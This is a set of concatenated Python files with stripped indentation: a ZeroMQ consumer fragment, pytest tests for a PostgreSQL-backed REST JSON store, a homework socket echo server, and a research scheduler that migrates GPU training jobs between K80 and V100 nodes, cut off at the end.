return
if check_port_is_used('127.0.0.1', int(self._queue_name) + 1):
self.logger.debug(f"""{int(self._queue_name) + 1} dealer 端口已经启动(或占用) """)
return
multiprocessing.Process(target=start_broker, args=(int(self._queue_name), int(self._queue_name) + 1)).start()
# noinspection DuplicatedCode
def _shedual_task(self):
self.start_broker_queue_name_as_port()
context = zmq.Context()
# noinspection PyUnresolvedReferences
zsocket = context.socket(zmq.REP)
zsocket.connect(f"tcp://localhost:{int(self._queue_name) + 1}")
while True:
message = zsocket.recv()
# self.logger.debug(f""" 从 zeromq 取出的消息是 {message}""")
self._print_message_get_from_broker('zeromq', message)
self._submit_task({'body': json.loads(message)})
zsocket.send('recv ok'.encode())
def _confirm_consume(self, kw):
pass #
def _requeue(self, kw):
self.publisher_of_same_queue.publish(kw['body'])
|
test_simple_rest_get_set.py
|
from contextlib import contextmanager
import requests
import sqlalchemy as sa
from sqlalchemy import exc
TEST_DB_NAME = 'test_rest_pgfire'
def get_test_config():
return {
"db": {
"db": TEST_DB_NAME,
"username": "postgres",
"port": 5432,
"password": "123456",
"host": "localhost"
}
}
@contextmanager
def db_connection():
db_props = get_test_config()
db_host = db_props.get("db").get("host")
db_port = db_props.get("db").get("port")
db_user = db_props.get("db").get("username")
db_password = db_props.get("db").get("password")
db_name = ''
connection_string = 'postgresql+psycopg2://{}:{}@{}:{}/{}'.format(db_user,
db_password,
db_host,
db_port,
db_name)
engine = sa.create_engine(connection_string)
conn = engine.connect()
yield conn
conn.close()
engine.dispose()
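# Illustrative sketch: db_connection() yields a raw SQLAlchemy connection and
# disposes of the engine afterwards, so ad-hoc statements can be issued like this.
def example_list_databases():
    """Return the names of all databases visible to the configured user."""
    with db_connection() as conn:
        rows = conn.execute("SELECT datname FROM pg_database")
        return [row[0] for row in rows]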
def setup_module(module):
with db_connection() as conn:
conn = conn.execution_options(autocommit=False)
conn.execute("ROLLBACK")
try:
conn.execute("DROP DATABASE %s" % TEST_DB_NAME)
except sa.exc.ProgrammingError as e:
# Could not drop the database, probably does not exist
conn.execute("ROLLBACK")
except sa.exc.OperationalError as e:
# Could not drop database because it's being accessed by other users (psql prompt open?)
conn.execute("ROLLBACK")
conn.execute("CREATE DATABASE %s" % TEST_DB_NAME)
start_app()
process = None
def teardown_module(module):
stop_app()
def stop_app():
global process
process.terminate()
process.join()
def __start_app():
from app import prepare_app
from aiohttp import web
app = prepare_app()
# override test config
app['config'] = get_test_config()
web.run_app(app, host="localhost", port=8666)
def start_app():
global process
from multiprocessing import Process
import time
process = Process(target=__start_app)
process.start()
time.sleep(2)
def test_create_json_db():
url = 'http://localhost:8666/createdb'
data = {
"db_name": "a_json_db"
}
response = requests.post(url=url, json=data)
assert response.ok
# # create the same db again
# response = requests.post(url=url, json=data)
# assert response.status_code == 400
def test_get_put_post_delete_from_app():
# create json db
json_db_name = "a_json_db_1"
url = 'http://localhost:8666/createdb'
data = {
"db_name": json_db_name
}
response = requests.post(url=url, json=data)
assert response.ok
path = "rest/saving-data/fireblog/users"
data = {
"alanisawesome": {
"name": "Alan Turing",
"birthday": "June 23, 1912"
}
}
# put data
url = 'http://localhost:8666/database/%s/%s'
response = requests.put(url=url % (json_db_name, path), json=data)
assert response.ok
assert response.json() == data
# get data
response = requests.get(url=url % (json_db_name, "rest/saving-data/fireblog"))
assert response.ok
d = response.json()
assert response.json() == {"users": {"alanisawesome": {"name": "Alan Turing", "birthday": "June 23, 1912"}}}
# patch data
path = "rest/saving-data/fireblog/users/alanisawesome"
data = {"nickname": "Alan The Machine"}
response = requests.patch(url=url % (json_db_name, path), json=data)
assert response.ok
assert response.json() == data
# post data
path = "rest/saving-data/fireblog/posts"
data = {"author": "gracehopper", "title": "The nano-stick"}
response = requests.post(url=url % (json_db_name, path), json=data)
assert response.ok
posted_data = response.json()
assert requests.get(url=url % (
json_db_name,
"rest/saving-data/fireblog/posts/%s" % list(posted_data.keys())[0])
).json() == data
# delete data
path = "rest/saving-data/fireblog/users/alanisawesome"
response = requests.delete(url=url % (json_db_name, path))
assert response.ok
response = requests.get(url=url % (json_db_name, path))
assert response.ok
def test_delete_json_db():
# create json db
json_db_name = "a_json_db_2"
url = 'http://localhost:8666/createdb'
data = {
"db_name": json_db_name
}
response = requests.post(url=url, json=data)
assert response.ok
url = 'http://localhost:8666/deletedb'
response = requests.delete(url=url, json=data)
assert response.ok
data_received_count1 = 0
def test_eventsource_api():
# create json db
json_db_name = "a_json_db_3"
url = 'http://localhost:8666/createdb'
data = {
"db_name": json_db_name
}
response = requests.post(url=url, json=data)
assert response.ok
import threading
url_event = 'http://localhost:8666/database_events/%s/%s'
url = 'http://localhost:8666/database/%s/%s'
post_data1 = {"t": 1}
post_data2 = {"t": 2}
post_data3 = {"t": 3}
listen_path = 'rest/saving-data/fireblog1/posts'
requests.post(url=url % (json_db_name, listen_path), json=post_data1)
from sseclient import SSEClient
sse = SSEClient(url_event % (json_db_name, listen_path))
def message_listener():
global data_received_count1
for msg in sse:
data_received_count1 += 1
print("SSE:" + str(msg))
thr = threading.Thread(target=message_listener)
    thr.daemon = True
thr.start()
# write data
import time
time.sleep(5)
requests.post(url=url % (json_db_name, listen_path), json=post_data2)
requests.post(url=url % (json_db_name, listen_path), json=post_data3)
time.sleep(5)
assert data_received_count1 == 3
|
hw7.py
|
from dominate import document
from dominate.tags import div, attr, p
from time import sleep
import socket
import threading
def create_doc(my_date = ""):
doc = document(title="My favorite page")
with doc:
with div():
attr(cls="body")
p("lorem ipsum")
p(f"{my_date}")
return doc
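# Illustrative sketch: a dominate document renders to HTML when converted to a
# string; echo_server below builds such a document for every message that is not
# "done". The date string is an example value.
def example_render(date_string="2024-01-01"):
    """Return the generated page as an HTML string."""
    return str(create_doc(date_string))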
def echo_server(host, port):
with socket.socket() as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(1)
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(1024)
str_data = str(data, "UTF-8")
if not data:
break
print(f"From client: {data}")
if str_data != "done":
html_data = create_doc(str_data)
conn.send(b"HTML-document was generate!")
else:
conn.send(b"Transaction are beended!")
def simple_client(host, port, message = ''):
with socket.socket() as s:
while True:
try:
s.connect((host, port))
print(f"Connected with host - {host} by port - {port}")
s.sendall(bytes(message,"UTF-8"))
data = s.recv(1024)
print(f"From server: {data}")
break
except ConnectionRefusedError:
sleep(0.5)
def main():
host = "127.0.0.1"
port = 55555
message = ''
while message != "done":
message = input("Enter that You to find:\t")
server = threading.Thread(target=echo_server, args=(host, port))
client = threading.Thread(target=simple_client, args=(host, port, message))
server.start()
client.start()
server.join()
client.join()
if __name__ == "__main__":
main()
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
import csv
from sklearn import neighbors
import gpu_pwr
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
for item in queue:
JCT[str(item)] = 0
completion = {}
for item in queue:
completion[str(item)] = 0
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
b_start = {} # initialize this to 0 as well
for item in queue:
b_start[str(item)] = 0
c_start = {} # initialize this to 0 as well
for item in queue:
c_start[str(item)] = 0
d_start = {} # initialize this to 0 as well
for item in queue:
d_start[str(item)] = 0
ovhd_a = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_a[str(item)] = []
ovhd_b = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_b[str(item)] = []
ovhd_c = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_c[str(item)] = []
ovhd_d = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_d[str(item)] = []
ovhd_total = {} # {1: [10, 12, ...], 2: [xx]}
for item in queue:
ovhd_total[str(item)] = []
k80_1st = {}
for item in queue:
k80_1st[str(item)] = []
v100_1st = {}
for item in queue:
v100_1st[str(item)] = []
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
V100_epoch_time = {}
for item in queue:
V100_epoch_time[str(item)] = 0
K80_epoch_time = {}
for item in queue:
K80_epoch_time[str(item)] = 0
K80_start_time = {}
for item in queue:
K80_start_time[str(item)] = 0
V100_start_time = {}
for item in queue:
V100_start_time[str(item)] = 0
promote_start_time = {}
for item in queue:
promote_start_time[str(item)] = 0
demote_list = []
K80_time = {}
for item in queue:
K80_time[str(item)] = 0
V100_time = {}
for item in queue:
V100_time[str(item)] = 0
gpu_usage_time = [] # don't initialize this
gpu_usage = []
gpu_usage_completion = []
speedup_dict = {}
for item in queue:
speedup_dict[str(item)] = 0
predict_dict = {}
for item in queue:
predict_dict[str(item)] = 0
birthplace = {}
for item in queue:
birthplace[str(item)] = 'none'
index = 0
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
qualified_job = []
step1_job = []
step2_job = []
pc_job = []
K80_node = 'c2180'
V100_node = 'd1024'
host_node = 'c0170'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
######################### do a regression fit ########################
with open('v100_data/x_data.json') as f:
x_train = json.load(f)
with open('v100_data/y_data.json') as f:
y_train = json.load(f)
model_V100 = neighbors.KNeighborsRegressor(n_neighbors = 4, weights='distance')
model_V100.fit(x_train, y_train)
with open('k80_data/x_data.json') as f:
x_train = json.load(f)
with open('k80_data/y_data.json') as f:
y_train = json.load(f)
model_K80 = neighbors.KNeighborsRegressor(n_neighbors = 1, weights='distance')
model_K80.fit(x_train, y_train)
####################################################################
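# send_signal() below implements the control channel to the GPU nodes: it opens a TCP connection to
# port 10000 on the K80 node or port 10001 on the V100 node (presumably a companion daemon listens there),
# sends a plain-text command such as 'start <job> gpu <gpu>', 'save <job> pid <pid>', 'kill <job>',
# 'resume <job> gpu <gpu>' or 'measure <job> gpu <gpu>', and blocks until the daemon replies 'success'.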
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
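# max_speedup_promotion() picks which jobs move between GPU types: if enough K80s are free it ranks all
# candidates (current V100 jobs plus the promote list) by their estimated speedup and keeps the top ones
# on V100s; a V100 job is only swapped out for a K80 job whose estimated speedup is at least 0.05 higher
# (lazy migration), so near-ties do not trigger a checkpoint/migrate cycle.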
def max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global speedup_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always force demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = demote_list
#if 'idle' in V100_qual:
# V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if num_promote <= V100_vacant: # promote all jobs as well
return promote_list[:], force_demote[:]
else:
pool_dict = {}
V100_avail = V100_vacant + len(V100_qual)
for job in V100_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(demote_list).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
# lazy migration: for every V100 job, from high speedup to low speedup, that is not in sorted_pool, compare it with
# K80 jobs in sorted_pool, from low speedup to high speedup. If the speedup difference is within 0.05, cancel the
# swap: the V100 job stays on the V100 and the K80 job stays on the K80
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.05:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
# situations below won't happen
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
if len(sorted_pool) > 0:
raise ValueError('Bug: demotion should not happen because no job is practically complete')
return promote_list, sorted_pool
else:
raise ValueError('Bug with max speedup promotion, condition not considered')
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
global pid_dict
pid = pid_dict['job'+job]
send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000'
global ovhd_start
ovhd_start[job] = time.time()
time.sleep(3) # in case epoch_waste is communicated too frequently
def kill_job(node, job): # kill_job('c2176', '50'), this is to kill the run.sh associated with the job
send_signal(node, 'kill ' + job)
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch
# in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs.
def check_step1_complete(job_list, node):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global V100_epoch_time
global K80_epoch_time
for job in job_list:
if job not in step1_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 0:
tc = dirs[0]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
if node == V100_node:
V100_epoch_time[job] = wall_time[1] - wall_time[0]
elif node == K80_node:
K80_epoch_time[job] = wall_time[1] - wall_time[0]
step1_job.append(job)
print('job' + job + ' has reached step1 complete')
except Exception:
pass
def check_step2_complete(job_list, node):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global step2_job
global V100_epoch_time
global K80_epoch_time
global speedup_dict
for job in job_list:
if job in step1_job and job not in step2_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 1:
tc = dirs[1]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
if node == K80_node:
K80_epoch_time[job] = wall_time[1] - wall_time[0]
V100_time_step2 = V100_epoch_time[job]
K80_time_step2 = wall_time[1] - wall_time[0]
elif node == V100_node:
V100_epoch_time[job] = wall_time[1] - wall_time[0]
K80_time_step2 = K80_epoch_time[job]
V100_time_step2 = wall_time[1] - wall_time[0]
speedup = (K80_time_step2 - V100_time_step2) / K80_time_step2
speedup_dict[job] = speedup
step2_job.append(job)
print('job' + job + ' has reached step2 complete')
except Exception:
pass
# measure job
def measure_job(node, gpu, job):
cmd = 'measure ' + job + ' gpu ' + gpu
send_signal(node, cmd)
############### first clear finish status of all jobs ####################
pid_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
pid_dict[job_name] = 0
checkpoint_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
checkpoint_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
epoch_waste_dict[job_name] = 0
#################### background thread running TCP socket ########################
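# thread_function() is the controller's listener: each worker connects to port 10002 on the host node and
# sends messages of the form '<jobname> <keyword> [value]'. Keywords handled below: ckpt_qual, finish, pid,
# checkpoint, waste, b_end, c_end, d_end, 1st_epoch and completion; every message is acknowledged with
# b'success', presumably so the sender can block until the controller has recorded it.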
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
global K80_start_time
global V100_start_time, promote_start_time
global K80_job
global V100_job
global K80_time
global V100_time
global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, v100_1st, ovhd_start, overhead, ovhd_total
global b_start, c_start, d_start, completion
if 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
if job in list(K80_job.values()):
K80_time[job] += int(time.time() - K80_start_time[job])
elif job in list(V100_job.values()):
V100_time[job] += int(time.time() - V100_start_time[job])
elif 'pid' in data_str:
global pid_dict
job_name = data_str.split(' ')[0]
pid = data_str.split(' ')[2]
pid_dict[job_name] = pid
elif 'checkpoint' in data_str: # can only be received after save signal is sent
global checkpoint_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
checkpoint_dict[job_name] = 1
ovhd_a[job].append(int(time.time() - ovhd_start[job]))
b_start[job] = time.time()
elif 'waste' in data_str:
global epoch_waste_dict
job_name = data_str.split(' ')[0]
epoch_waste_time = data_str.split(' ')[2]
epoch_waste_dict[job_name] += int(epoch_waste_time)
elif 'b_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_b[job].append(int(time.time() - b_start[job]))
c_start[job] = time.time()
elif 'c_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_c[job].append(int(time.time() - c_start[job]))
d_start[job] = time.time()
elif 'd_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_d[job].append(int(time.time() - d_start[job]))
ovhd_total[job].append(int(time.time() - ovhd_start[job]))
if ovhd_start[job] != 0:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
if job in list(K80_job.values()):
K80_start_time[job] = time.time()
elif job in list(V100_job.values()):
V100_start_time[job] = time.time()
promote_start_time[job] = time.time()
elif '1st_epoch' in data_str: # 'job50 1st_epoch 35'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
epoch_time = int(data_str.split(' ')[2])
if job in list(K80_job.values()):
k80_1st[job].append(epoch_time)
elif job in list(V100_job.values()):
v100_1st[job].append(epoch_time)
elif 'completion' in data_str: # 'job50 completion 0.33'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
completion_portion = float(data_str.split(' ')[2])
completion[job] = completion_portion
if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str:
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
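# Main scheduling loop. Each iteration: (1) reap finished jobs on both GPU types, (2) update step1/step2
# profiling state and refresh the speedup predictions, (3) start newly arrived queue jobs on idle GPUs,
# (4) build the promote/demote candidate lists and let max_speedup_promotion() decide the migrations,
# (5) checkpoint the selected jobs, wait for the checkpoints, then resume them on the other GPU type,
# (6) record GPU usage, sleep for INTERVAL seconds and check the termination condition.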
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
if job in demote_list:
demote_list.remove(job)
################ check step1 finished job of K80 jobs and step 2 of V100 #################
check_step1_complete(list(V100_job.values()), V100_node)
check_step2_complete(list(K80_job.values()), K80_node)
for job in list(V100_job.values()):
if job not in qualified_job and job != 'idle':
if job in step1_job:
kill_job(V100_node, job)
qualified_job.append(job)
print('job ' + job + ' has been qualified for demotion to K80')
time.sleep(3) # wait for run.sh to finish
x1, x3 = gpu_pwr.process_csv('job'+job)
x2 = 3600 / V100_epoch_time[job]
speedup_pred = model_V100.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
check_step1_complete(list(K80_job.values()), K80_node)
check_step2_complete(list(V100_job.values()), V100_node)
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
if job in step1_job:
kill_job(K80_node, job)
qualified_job.append(job)
print('job ' + job + ' has been qualified for promotion to V100 for profiling')
time.sleep(3) # wait for run.sh to finish
x1, x3 = gpu_pwr.process_csv('job'+job)
x2 = 3600 / K80_epoch_time[job]
speedup_pred = model_K80.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
############### start new jobs on idle K80s and V100s before promoting K80 jobs to idle V100 ################
if V100_used < V100_cap:
V100_free = V100_cap - V100_used
for i in range(V100_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in V100_job.items():
if job == 'idle': # schedule new job here if idle
start_job(V100_node, gpu, job_new)
birthplace[job_new] = V100_node
measure_job(V100_node, gpu, job_new)
V100_job[gpu] = job_new
job_start[job_new] = time.time()
V100_start_time[job_new] = time.time()
index += 1
V100_used += 1
time.sleep(5) # don't communicate too often
break
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
birthplace[job_new] = K80_node
measure_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
K80_start_time[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
promote_list = [] #list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
for gpu, job in K80_job.items():
if job != 'idle':
if job in step2_job and len(ovhd_total[job]) > 0:
promote_list.append(job)
elif job not in step2_job and job in qualified_job and birthplace[job] == K80_node:
promote_list.append(job)
# print('job ' + job + 'qualified for promote for profiling')
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
# look at demote list
for gpu, job in V100_job.items():
if job != 'idle':
# for jobs who have finished profiling, added the job
if job not in demote_list and job in step2_job and len(ovhd_total[job]) > 0:
job_speedup = speedup_dict[job] # 0.7
job_ovhd = np.mean(ovhd_total[job]) # 100
k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job]
v100_1st_ovhd = np.mean(v100_1st[job]) - V100_epoch_time[job]
demote_qualify_time = (2 * job_ovhd + k80_1st_ovhd + v100_1st_ovhd) / job_speedup
if int(time.time() - promote_start_time[job]) > demote_qualify_time:
demote_list.append(job)
print('job ' + job + ' qualified for demote for passing demote qualify time ' +
str(int(demote_qualify_time)))
# for jobs who have not finished profiling, add the job if it's qualified and it started on V100
elif job not in demote_list and job not in step2_job and job in qualified_job and birthplace[job] == V100_node:
demote_list.append(job)
print('job ' + job + ' qualified for demote for profiling')
if len(promote_list) > 0 or len(demote_list) > 0:
promoted, demoted = max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
checkpoint_finish_check = []
for gpu, job in K80_job.items():
if job in promoted:
# make sure promoted step1 job doesn't get demoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 1
save_job(K80_node, job)
if finish_dict['job'+job] != 1:
K80_time[job] += int(time.time() - K80_start_time[job])
checkpoint_finish_check.append(job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
# make sure demoted step1 job doesn't get promoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 0.01
save_job(V100_node, job)
if finish_dict['job'+job] != 1:
V100_time[job] += int(time.time() - V100_start_time[job])
checkpoint_finish_check.append(job)
V100_job[gpu] = 'idle'
V100_used -= 1
demote_list.remove(job)
# wait for all GPUs to be available
if len(checkpoint_finish_check) > 0:
while True:
time.sleep(5)
for job in checkpoint_finish_check[:]:
if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free
print(job + ' checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
checkpoint_finish_check.remove(job)
# also check if job already finished before sending checkpoint signal
elif finish_dict['job'+job] == 1:
print(job + ' finished before receiving checkpoint signal')
checkpoint_finish_check.remove(job)
if len(checkpoint_finish_check) == 0:
break
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
V100_job[gpu] = job_new
resume_job(V100_node, gpu, job_new)
num_mig[job_new] += 1
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
print('job'+job_new+' has finished before checkpointing')
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
############## monitor GPU usage ############
usage = K80_used + V100_used
time_stamp = int(time.time() - queue_timer)
gpu_usage_time.append(time_stamp)
gpu_usage.append(usage)
total_completion = np.sum(list(completion.values()))
gpu_usage_completion.append(total_completion)
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
K80_time_name = testcase + '_K80_time.json'
V100_time_name = testcase + '_V100_time.json'
gpu_usage_name = testcase + '_gpu_usage.csv'
ovhd_a_name = testcase + '_ovhd_a.json'
ovhd_b_name = testcase + '_ovhd_b.json'
ovhd_c_name = testcase + '_ovhd_c.json'
ovhd_d_name = testcase + '_ovhd_d.json'
ovhd_total_name = testcase + '_ovhd_total.json'
k80_1st_name = testcase + '_k80_1st.json'
v100_1st_name = testcase + '_v100_1st.json'
speedup_name = 'speedup.json'
predict_name = 'predict.json'
demote_list_name = 'demote_list.json'
completion_name = 'completion.json'
birthplace_name = testcase + '_birthplace.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
